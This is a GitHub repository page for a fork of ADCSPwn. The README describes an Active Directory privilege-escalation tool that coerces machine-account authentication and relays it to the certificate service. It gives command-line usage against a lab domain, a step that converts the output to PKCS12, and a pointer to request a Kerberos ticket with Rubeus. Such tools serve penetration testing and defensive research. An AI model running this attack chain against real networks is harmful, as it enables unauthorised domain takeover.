Skip to content
/ ADCSPwn Public
forked from bats3c/ADCSPwn

A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service.

0 stars 127 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

W00t3k/ADCSPwn

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
ADCSPwn
ADCSPwn
 
 
README.md
README.md
 
 
bundle2pkcs12.py
bundle2pkcs12.py
 
 

Repository files navigation

ADCSPwn

A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service.

Usage

Run ADCSPwn on your target network.

adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]

Required arguments:
adcs            -       This is the address of the AD CS server which authentication will be relayed to.

Optional arguments:
port            -       The port ADCSPwn will listen on.
remote          -       Remote machine to trigger authentication from.

Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001

Convert the output into the PKCS12 certificate format using bundle2pkcs12

python3 bundle2pkcs12.py <output blob>

Request a TGT with the PKCS12 certificate using Rubeus.

About

A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

1 fork
Report repository

Releases

1 tags

Packages

No packages published

Languages

  • C# 98.5%
  • Python 1.5%